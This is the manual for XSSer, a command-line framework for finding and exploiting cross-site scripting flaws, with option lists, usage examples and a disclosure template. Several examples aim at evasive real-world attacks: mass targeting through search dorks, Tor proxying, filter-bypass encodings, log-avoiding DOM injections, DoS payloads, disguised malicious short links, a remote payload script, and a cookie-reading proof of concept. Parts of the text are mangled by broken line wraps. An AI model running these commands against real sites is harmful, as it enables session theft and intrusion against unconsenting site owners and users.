====================================

0.- Index:
===================
1.- Introduction
2.- Options and features
3.- Payloads
4.- Examples of usage
5.- How to XSS report to the Internet
6.- Documentation
7.- Downloads
====================================
1.- Introduction:
===================
Cross Site "Scripter" (aka XSSer), is an automatic -framework- to detect,
exploit and report
XSS vulnerabilities in web-based applications.
It contains several options to try to detect and "bypass" certain filters,
and various special
techniques of code injection.
====================================
2.- Options and features:
===================
xsser [OPTIONS] [-u <url> |-i <file> |-d <dork>] [-g <get> |-p <post> |-c
<crawl>]
[Request(s)] [Vector(s)] [Bypasser(s)] [Technique(s)] [Final Injection(s)]
*Options*:
--version
show program's version number and exit
-h, --help
show this help message and exit
-s, --statistics
show advanced statistics output results
-v, --verbose
active verbose mode output results
--gtk
launch XSSer GTK Interface (Wizard included!)
*Special Features*:
You can choose Vector(s) and Bypasser(s) to inject code with this extra

special features:
--imx=IMX
create a false image with XSS code embedded
--fla=FLASH
create a false .swf file with XSS code embedded
*Select Target(s)*:
At least one of these options has to be specified to set the source to g
et target(s) urls from.
You need to choose to run XSSer:
-u URL, --url=URL
Enter target(s) to audit
-i READFILE
Read target urls from a file
-d DORK
Process search engine dork results as target url
s
--De=DORK_ENGINE

Search engine to use for dorking (bing, altavist

a,
yahoo, baidu, yandex, youdao, webcrawler, google
, etc.
See dork.py file to check for available engines)
*Select type of HTTP/HTTPS Connection(s)*:
These options can be used to specify which parameter(s) we want to use l
ike payload to inject code.
-g GETDATA
Enter payload to audit using GET (ex: '/menu.php
?q=')
-p POSTDATA
Enter payload to audit using POST (ex: 'foo=1&ba
r=')
-c CRAWLING
Number of urls to crawl on target(s): 1-99999
--Cw=CRAWLER_WIDTH
Deeping level of crawler: 1-5
--Cl
Crawl only local target(s) urls (default TRUE)
*Configure Request(s)*:
These options can be used to specify how to connect to target(s) payload
(s).
You can choose multiple:
--cookie=COOKIE
Change your HTTP Cookie header
--drop-cookie
Ignore Set-Cookie header from response

--user-agent=AGENT
Change your HTTP User-Agent header (default SPOO
FED)
--referer=REFERER
Use another HTTP Referer header (default NONE)
--xforw
Set your HTTP X-Forwarded-For with random IP val
ues
--xclient
Set your HTTP X-Client-IP with random IP values
--headers=HEADERS
Extra HTTP headers newline separated
--auth-type=ATYPE
HTTP Authentication type (Basic, Digest, GSS, NT
LM)
--auth-cred=ACRED
HTTP Authentication credentials (name:password)
--proxy=PROXY
Use proxy server (tor: http://localhost:8118)
--ignore-proxy
Ignore system default HTTP proxy
--timeout=TIMEOUT
Select your timeout (default 30)
--retries=RETRIES
Retries when the connection timeouts (default 1)
--threads=THREADS
Maximum number of concurrent HTTP requests (defa
ult 5)
--delay=DELAY
Delay in seconds between each HTTP request (defa
ult 0)
--tcp-nodelay
Use the TCP_NODELAY option
--follow-redirects
XSSer will follow server redirection responses (
302)
--follow-limit=FLI
Set how many times XSSer will follow redirection
s
(default 50)
*Checker systems*:
This options are usefull to know if your target(s) have some filters aga
inst XSS attacks,

to reduce 'false positive' results and to perform more advanced tests:

--no-head
NOT verify the stability of the url (codes: 200|
302)
with a HEAD pre-check request
--alive=ISALIVE
set limit of every how much errors XSSer must to
verify that target is alive
--hash
send an unique hash, without vectors, to pre-che
ck if
target repeats all content recieved
--heuristic
launch a heuristic testing to discover which
parameters are filtered on target(s) code: ;\/<>
"'=
--checkaturl=ALT
check for a valid XSS response from target(s) at
an
alternative url. 'blind XSS'
--checkmethod=ALTM
check responses from target(s) using a different
connection type: GET or POST (default: GET)
--checkatdata=ALD
check responses from target(s) using an alternat
ive
payload (default: same than first injection)
--reverse-check
establish a reverse connection from target(s) to
XSSer
to certificate that is 100% vulnerable
*Select Vector(s)*:
These options can be used to specify a XSS vector source code to inject
in each payload.
Important, if you don't want to try to inject a common XSS vector, used
by default.
Choose only one option:
--payload=SCRIPT
OWN - Insert your XSS construction -manually--auto
AUTO - Insert XSSer 'reported' vectors from file
(HTML5 vectors included!)
*Select Bypasser(s)*:
These options can be used to encode selected vector(s) to try to bypass
all possible anti-XSS
filters on target(s) code and possible IPS rules, if the target use it.
Also, can be combined with other techniques to provide encoding:

--Str
Use method String.FromCharCode()
--Une
Use Unescape() function
--Mix
Mix String.FromCharCode() and Unescape()
--Dec
Use Decimal encoding
--Hex
Use Hexadecimal encoding
--Hes
Use Hexadecimal encoding, with semicolons
--Dwo
Encode vectors IP addresses in DWORD
--Doo
Encode vectors IP addresses in Octal
--Cem=CEM
Try -manually- different Character Encoding Muta
tions
(reverse obfuscation: good) -> (ex: 'Mix,Une,Str
,Hex')
*Special Technique(s)*:
These options can be used to try to inject code using different type of
XSS techniques.
You can choose multiple:
--Coo
COO - Cross Site Scripting Cookie injection
--Xsa
XSA - Cross Site Agent Scripting
--Xsr
XSR - Cross Site Referer Scripting
--Dcp
DCP - Data Control Protocol injections
--Dom
DOM - Document Object Model injections
--Ind
IND - HTTP Response Splitting Induced code
--Anchor
ANC - Use Anchor Stealth payloader (DOM shadows!
)
--Phpids
PHP - Exploit PHPIDS bug (0.6.5) to bypass filte
rs

*Select Final injection(s)*:

These options can be used to specify the final code to inject in vulnera
ble target(s).
Important, if you want to exploit on-the-wild your discovered vulnerabil
ities.
Choose only one option:
--Fp=FINALPAYLOAD
OWN

- Insert your final code to inject -manua

lly--Fr=FINALREMOTE
REMOTE - Insert your final code to inject -remot
elly--Doss
DOSs

- XSS Denial of service (server) injectio

DOS

- XSS Denial of service (client) injectio

B64

- Base64 code encoding in META tag (rfc23

n
--Dos
n
--B64
97)
*Special Final injection(s)*:
These options can be used to execute some 'special' injection(s) in vuln
erable target(s).
You can select multiple and combine with your final code (except with DC
P code):
--Onm
ONM - Use onMouseMove() event to inject code
--Ifr
IFR - Use <iframe> source tag to inject code
*Miscellaneous*:
--silent
inhibit console output results
--update
check for XSSer latest stable version
--save
output all results directly to template (XSSlist
.dat)
--xml=FILEXML
output 'positives' results to aXML file (--xml f
ilename.xml)
--short=SHORTURLS
display -final code- shortered (tinyurl, is.gd)
--launch

launch a browser at the end with each XSS discov

ered
--tweet
publish each XSS discovered into the 'Grey Swarm
!'
--tweet-tags=TT
add more tags to your XSS discovered publication
s
(default: #xss) - (ex: #xsser #vulnerability)
====================================
3.- Payloads:
===================
XSSer uses a list of XSS valid vectors to make automatic payloading attacks
on target(s).
https://n-1.cc/pg/pages/view/16105/
The reference table with supported browsers is:
- IE7.0
Vector works in Internet Explorer 7.0
- IE6.0
Vector works in Internet Explorer.
- NS8.1-IE
Vector works in Netscape 8.1+ in IE rendering engine mode.
- NS8.1-G
Vector works in Netscape 8.1+ in the Gecko rendering engine mode.
- FF2.0
Vector works in Mozilla's Gecko rendering engine, used by Firefox.
- O9.02
Vector works in Opera.
- NS4
Vector works in older versions of Netscape 4.0 - untest
Injections are valid as proof that browsers. The attacker can run the desir
ed code if any of the listings.
====================================
4.- Examples of usage:
===================
- Simple injection from URL:
$ python XSSer.py -u "http://host.com"
------------------- Simple injection from File, with tor proxy and spoofing HTTP Referer
headers:

$ python XSSer.py -i "file.txt" --proxy "http://127.0.0.1:8118" --refe

rer "666.666.666.666"
------------------- Multiple injections from URL, with automatic payloading, using tor p
roxy, injecting on
payloads character encoding in "Hexadecimal", with verbose output an
d saving results
to file (XSSlist.dat):
$ python XSSer.py -u "http://host.com" --proxy "http://127.0.0.1:8118"
--auto --Hex --verbose -w
------------------- Multiple injections from URL, with automatic payloading, using carac
ter encoding mutations
(first, change payload to hexadecimal; second, change to StringFromC
harCode the first encoding;
third, reencode to Hexadecimal the second encoding), with HTTP UserAgent spoofed, changing
timeout to "20" and using multithreads (5 threads):
$ python XSSer.py -u "http://host.com" --auto --Cem "Hex,Str,Hex" --us
er-agent "XSSer!!"
--timeout "20" --threads "5"
------------------- Advance injection from File, payloading your -own- payload and using
Unescape() character
encoding to bypass filters:
$ python XSSer.py -i "urls.txt" --payload 'a="get";b="URL(\"";c="javas
cript:";d="
alert('XSS');\")";eval(a+b+c+d);' --Une
------------------- Injection from Dork selecting "duck" engine (XSSer Storm!):
$ python XSSer.py --De "duck" -d "search.php?"
------------------- Injection from Crawler with deep 3 and 4 pages to see (XSSer Spider!
):
$ python XSSer.py -c3 --Cw=4 -u "http://host.com"
------------------- Simple injection from URL, using POST, with statistics results:
$ python XSSer.py -u "http://host.com" -p "index.php?target=search&sub
target=top&searchstring=" -s
-------------------

- Multiple injections from URL to a parameter sending with GET, using

automatic payloading,
with IP Octal payloading ofuscation and printering results in a "tin
yurl" shortered link
(ready for share!):
$ python XSSer.py -u "http://host.com" -g "bs/?q=" --auto --Doo --shor
t tinyurl
------------------- Simple injection from URL, using GET, injecting a vector in Cookie p
arameter, trying to use
a DOM shadow space (no server logging!) and if exists any "hole", ap
plying your manual
final payload "malicious" code (ready for real attacks!):
$ python XSSer.py -u "http://host.com" -g "bs/?q=" --Coo --Anchor --Fr
="!enter your final
injection code here!"
------------------- Simple injection from URL, using GET and trying to generate with res
ults a "malicious" shortered
link (is.gd) with a valid DoS (Denegation Of Service) browser client
payload:
$ python XSSer.py -u "http://host.com" -g "bs/?q=" --Dos --short "is.g
d"
------------------- Multiple injections to multiple places, extracting targets from a li
st in a FILE, applying
automatic payloading, changing timeout to "20" and using multithread
s (5 threads), increasing
delay between petitions to 10 seconds, injecting parameters in HTTP
USer-Agent, HTTP Referer
and in Cookie parameters, using proxy Tor, with IP Octal ofuscation,
with statistics results,
in verbose mode and creating shortered links (tinyurl) of any valid
injecting payloads found.
(real playing mode!):
$ python XSSer.py -i "list_of_url_targets.txt" --auto --timeout "20" -threads "5" --delay "10"
--Xsa --Xsr --Coo --proxy "http://127.0.0.1:8118" --Doo -s --verbose
--Dos --short "tinyurl"
------------------- Injection of user XSS vector directly in a malicious -fake- image cr
eated "on the wild",
and ready to be uploaded.
$ python XSSer.py --Imx "test.png" --payload "!enter your malicious in
jection code here!"

------------------- Report output 'positives' injections of a dorking search (using "ask

" dorker) directly to
a XML file.
$ python XSSer.py -d "login.php" --De "ask" --xml "security_report_XSS
er_Dork_cuil.xml"
------------------- Publish output 'positives' injections of a dorking search (using "du
ck" dorker) directly to
http://identi.ca (federated XSS pentesting botnet)
$ python XSSer.py -d "login.php" --De "duck" --tweet
* Examples online:
- http://identi.ca/xsserbot01
- http://twitter.com/xsserbot01
------------------- Create a .swf movie with XSS code injected
$ python XSSer.py --imx "name_of_file"
------------------- Send a pre-checking hash to see if target will generate -false posit
ive- results
$ python XSSer.py -u "host.com" --check
------------------- Multiple fuzzing injections from url, including DCP injections and e
xploiting our "own" code,
spoofed in a shortered link, on positive results founded. XSS real-t
ime exploiting.
$ python XSSer.py -u "host.com" --auto --Dcp --Fp "enter_your_code_her
e" --short "is.gd"
------------------- Exploiting Base64 code encoding in META tag (rfc2397) in a manual pa
yload of a vulnerable target.
$ python XSSer.py -u "host.com" -g "vulnerable_path" --payload "valid_
vector_injected" --B64
------------------- Exploiting our "own" -remote code- in a payload discovered using fuz
zing and launch it in a
browser directly.
$ python XSSer.py -u "host.com" -g "vulnerable_path" --auto --Fr "my_h

ost/path/code.js" --launch
====================================
5.- How to XSS report to the Internet:
===================
If you want report a XSS vulnerability in a software to the global Interne
t, you can send an email
directly to some open security mailing list.
More common are (of course, there are others):
- Bugtraq:
bugtraq@securityfocus.com
- FD:
full-disclosure@lists.grok.org.uk
If you never sended a security report before, check this template:
---------------- cut here ---------------------------Subject:
<name of software> <version> <== Cross Site <reflected/persistent> Scripti
ng
----1. OVERVIEW
The <name of software> <version> and lower versions were vulnerable to Cro
ss Site Scripting.
2. BACKGROUND
<name of software>
<description of software>
3. VULNERABILITY DESCRIPTION
<description of vulnerability>
- example:
The 'Target' parameter was not properly sanitized after user logs in, whic
h allows attacker
to conduct Cross Site Scripting attack.
An attacker could prepare a link in a forum post that includes a link to a
file which seems to
require authentication. Upon logging in, user will get XSSed.
4. VERSIONS AFFECTED
<version> and lower
5. PROOF-OF-CONCEPT/EXPLOIT
http://target.com/index.php?p=/entry/signin&Target=javascript:alert(docume

nt.cookie)//http://
6. SOLUTION
Upgrade to <name of software><version> or higher
7. VENDOR
<name of vendor>: http://vendor.com/
8. CREDIT
This vulnerability was discovered by: <data about researcher>
9. DISCLOSURE TIME-LINE
- example:
2010-12-14: notified vendor
2011-01-18: vendor released fix
2011-01-27: vulnerability disclosed
10. REFERENCES
Original Advisory URL:
http://researcher.website.org/lab/vulnerability_founded
- XSS FAQs: http://www.cgisecurity.com/articles/xss-faq.shtml
- XSS (wiki): http://en.wikipedia.org/wiki/Cross-site_scripting
- XSS (owasp): http://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
---------------- cut here ---------------------------Is important add to the report the tools that you used in your researching
tasks to discover the vulnerabilities.
For example, you can put another section doing a mention of them, like thi
s:
----------?. TOOLS
This vulnerability was discovered using XSSer Swarm Edition!.
More info: http://xsser.sf.net
----------This info can be very usefull for developers and other researchers of secu
rity tools.
====================================
6.- Documentation:
===================
Slides: XSSer "The Mosquito" - 2011

- http://xsser.sourceforge.net/xsser/XSSer_the_mosquito_2011.pdf
XSS for fun and profit - conference SCG/09 -PDF (184 pages)
+ English Version:
- http://xsser.sourceforge.net/xsser/XSS_for_fun_and_profit_SCG0
9_(english).pdf
+ Spanish Version:
- http://xsser.sourceforge.net/xsser/XSS_for_fun_and_profit_SCG0
9_(spanish).pdf
URL Generation Schema (an schema about how XSSer injects code)
- http://xsser.sourceforge.net/xsser/url_generation.png
Also, you have some videos about "how to use XSSer" on the Internet.
- http://xsser.blip.tv
====================================
7.- Downloads:
===================
XSSer (official version) can be downloaded from its SourceForge File List
page:
- http://sourceforge.net/projects/xsser/files/.
You can also checkout the latest development version from the XSSer -Subv
ersion- repository:
$ svn co https://xsser.svn.sourceforge.net/svnroot/xsser xsser
For more details, check the main website:
- http://xsser.sf.net